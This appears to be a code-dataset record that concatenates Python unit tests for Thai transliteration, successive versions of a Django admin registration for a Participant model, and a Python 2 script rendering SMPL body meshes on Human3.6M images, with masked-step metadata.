self.assertEqual(romanize(\"ชารินทร์\", engine=\"thai2rom\"), \"charin\")\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n\n UNK_TOKEN = 1 # UNK_TOKEN or <UNK> is represented by 1\n END_TOKEN = 3 # END_TOKEN or <end> is represented by 3\n\n self.assertListEqual(\n transliterater._prepare_sequence_in(\"A\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n self.assertListEqual(\n transliterater._prepare_sequence_in(\"♥\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n self.assertNotEqual(\n transliterater._prepare_sequence_in(\"ก\")\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n 
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)\n .cpu()\n .detach()\n .numpy()\n .tolist(),\n )\n\n def test_transliterate(self):\n self.assertEqual(transliterate(\"\"), \"\")\n self.assertEqual(transliterate(\"แมว\", \"pyicu\"), \"mæw\")\n self.assertEqual(transliterate(\"คน\", engine=\"ipa\"), \"kʰon\")\n self.assertIsNotNone(transliterate(\"คน\", engine=\"thaig2p\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"thaig2p\"))\n self.assertIsNotNone(transliterate(\"คน\", engine=\"tltk_g2p\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"tltk_g2p\"))\n self.assertIsNotNone(transliterate(\"คน\", engine=\"tltk_ipa\"))\n self.assertIsNotNone(transliterate(\"แมว\", engine=\"tltk_ipa\"))\n self.assertIsNotNone(trans_list(\"คน\"))\n self.assertIsNotNone(xsampa_list(\"คน\"))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(\"\"), \"\")\n remove(\"thai_w2p\")\n self.assertIsNotNone(pronunciate(\"คน\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"แมว\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"มข.\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"มช.\", engine=\"w2p\"))\n self.assertIsNotNone(pronunciate(\"jks\", engine=\"w2p\"))\n\n def test_puan(self):\n self.assertEqual(puan(\"นาริน\"), \"นิน-รา\")\n self.assertEqual(puan(\"นาริน\", False), \"นินรา\")\n self.assertEqual(puan(\"แสงดีนะ\"), \"แสง-ดะ-นี\")\n self.assertEqual(puan(\"แสงดีนะ\", False), \"แสงดะนี\")\n with self.assertRaises(ValueError):\n self.assertEqual(puan(\"สวัสดีครับ\"), \"สวัสดีครับ\")\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class ParticipantAdmin(admin.ModelAdmin):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
        'institution', 'assistant']}), ('Assistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
        'institution', 'assistant']}), ('Assistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
from .models import Participant
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [('Personal information', {'fields': ['email', 'name',
        'institution', 'assistant']}), ('Assistance', {'fields': [
'assistant', 'participant_hash']}), ('Contribution', {'fields': [
'contribution', 'title', 'abstract', 'link']})]
list_display = 'email', 'name', 'assistant', 'contribution', 'title'
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
<|reserved_special_token_1|>
from django.contrib import admin
# Register your models here.
from .models import Participant
class ParticipantAdmin(admin.ModelAdmin):
fieldsets = [
("Personal information", {'fields': ['email', 'name', 'institution', 'assistant']}),
("Asistance", {'fields': ['assistant', 'participant_hash']}),
("Contribution", {'fields': ['contribution', 'title', 'abstract', 'link']}),
]
list_display = ('email', 'name', 'assistant', 'contribution', 'title')
list_filter = ['assistant', 'contribution']
admin.site.register(Participant, ParticipantAdmin)
|
flexible
|
{
"blob_id": "c43b899234ffff09225153dcaf097591c7176430",
"index": 841,
"step-1": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-4": "from django.contrib import admin\nfrom .models import Participant\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [('Personal information', {'fields': ['email', 'name',\n 'institution', 'assistant']}), ('Asistance', {'fields': [\n 'assistant', 'participant_hash']}), ('Contribution', {'fields': [\n 'contribution', 'title', 'abstract', 'link']})]\n list_display = 'email', 'name', 'assistant', 'contribution', 'title'\n list_filter = ['assistant', 'contribution']\n\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-5": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Participant\n\n\nclass ParticipantAdmin(admin.ModelAdmin):\n fieldsets = [\n (\"Personal information\", {'fields': ['email', 'name', 'institution', 'assistant']}),\n (\"Asistance\", {'fields': ['assistant', 'participant_hash']}),\n (\"Contribution\", {'fields': ['contribution', 'title', 'abstract', 'link']}),\n ]\n list_display = ('email', 'name', 'assistant', 'contribution', 'title')\n list_filter = ['assistant', 'contribution']\n\nadmin.site.register(Participant, ParticipantAdmin)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 17:27:57 2020
@author: li
"""
import numpy as np
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
from opendr.camera import ProjectPoints
import cPickle as pkl
from models.smpl import Smpl, copy_smpl, joints_coco
import h5py
from util import im
from render_model import render_model
from util.imutils import crop
import cv2
import matplotlib.pyplot as plt
from os.path import join
import scipy.io as sio
index = 800
#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'
test_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'
#spin = '../SPIN_MV/S1_single_smplify.npz'
spin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'
#our = '../SPIN_MV/S1_multi_smplify.npz'
our = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'
mpi_inf_valid = np.load(test_path)
ROOT = '../SPIN_MV/data/'
mpi_inf_spin = np.load(spin)
mpi_inf_pred = np.load(our)
IMG_RES = 224
focal_length = 5000
model_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'
with open(model_file, 'rb') as fp:
model_data = pkl.load(fp)
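# model_data now holds the SMPL model parameters: template mesh, shape/pose blendshapes, joint regressor and skinning weights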
fig = plt.figure()
#plt.ion()
#gt_keypoints = np.zeros((400,24,4))
for i in range(70563,70564):
imgname = mpi_inf_valid['imgname'][i]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i]
scale = mpi_inf_valid['scale'][i]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i]
betas = mpi_inf_pred['betas'][i]
camera = mpi_inf_pred['camera'][i]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
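    # convert the predicted weak-perspective camera (s, tx, ty) into a full 3D translation; tz = 2*f/(s*IMG_RES)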
camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
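    # opendr pinhole camera: identity rotation, principal point at the center of the 224x224 crop, focal length 5000 px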
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
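    # distance from the camera to the mesh centroid, used below to push out the far clipping plane (far=20+dist)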
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i]
betas_spin = mpi_inf_spin['betas'][i]
camera = mpi_inf_spin['camera'][i]
camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
ort = np.reshape(pose_spin[:3],(3,1))
#print(ort)
ort_mat = cv2.Rodrigues(ort)[0]
#print(ort_mat)
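    # diag(-1,-1,1) equals Rz(pi): rotate the root orientation 180 degrees about the z-axis to render a flipped view (im_1)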
trans_mat = np.array([[-1,0,0],
[0,-1,0],
[0,0,1]])
new_ort = ort_mat.dot(trans_mat)
pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
fig = plt.figure()
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
height, width, channels = rgb_img.shape
    # with dpi=300, the saved image size equals height*width pixels
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_original_%06d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,2)
plt.imshow(rgb_img)
plt.imshow(im)
    # with dpi=300, the saved image size equals height*width pixels
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_our_%06d.png" % (i), dpi=300)
#fig = plt.figure()
#plt.subplot()
#plt.imshow(im_1)
    # with dpi=300, the saved image size equals height*width pixels
# fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
# plt.gca().xaxis.set_major_locator(plt.NullLocator())
# plt.gca().yaxis.set_major_locator(plt.NullLocator())
#plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
#plt.margins(0,0)
#plt.axis('off')
#plt.savefig("../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
plt.imshow(im_spin)
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_spin_%06d.png" % (i), dpi=300)
#plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)
#plt.pause(1e-3)
"""
iter_num = 25
batch_size = 4
for i in range(24,25): # iteration number
for j in range(2,3): #batch_size
for k in range(1,2):
imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i*batch_size+j][k]
scale = mpi_inf_valid['scale'][i*batch_size+j][k]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]
betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]
camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
#camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]
betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]
camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]
#camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
# orignal image
fig = plt.figure()
#plt.imshow(im+)
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
plt.axis('off')
#plt.subplot(1,3,2)
height, width, channels = rgb_img.shape
            # with dpi=300, the saved image size equals height*width pixels
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png" % (i*batch_size+j, k), dpi=300)
# multi
fig = plt.figure()
plt.imshow(rgb_img)
plt.imshow(im)
plt.axis('off')
height, width, channels = rgb_img.shape
            # with dpi=300, the saved image size equals height*width pixels
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png" % (i*batch_size+j, k), dpi=300)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
# single
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
plt.imshow(im_spin)
plt.axis('off')
#plt.ioff()
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_single.png" % (i*batch_size+j, k), dpi=300)
#plt.pause(1e-3)
#plt.show()
"""
"""
H36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]
H36M_TO_J14 = H36M_TO_J17[:14]
J24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]
J24_TO_J14 = J24_TO_J17[:14]
joint_mapper_gt = J24_TO_J14
joint_mapper_h36m = H36M_TO_J14
gt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]
sio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})
sio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})
sio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})
"""
|
normal
|
{
"blob_id": "2540e2752edaedbf2a011a25cb90f220ae770757",
"index": 7611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\n<mask token>\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n 
plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-3": "<mask token>\nindex = 800\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = (\n 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl')\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n 
plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-4": "<mask token>\nimport numpy as np\nfrom opendr.renderer import ColoredRenderer\nfrom opendr.lighting import LambertianPointLight\nfrom opendr.camera import ProjectPoints\nimport cPickle as pkl\nfrom models.smpl import Smpl, copy_smpl, joints_coco\nimport h5py\nfrom util import im\nfrom render_model import render_model\nfrom util.imutils import crop\nimport cv2\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport scipy.io as sio\nindex = 800\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = (\n 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl')\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\nfor i in range(70563, 70564):\n imgname = mpi_inf_valid['imgname'][i]\n rgb_img = cv2.imread(join(ROOT, imgname))[:, :, ::-1].copy().astype(np.\n 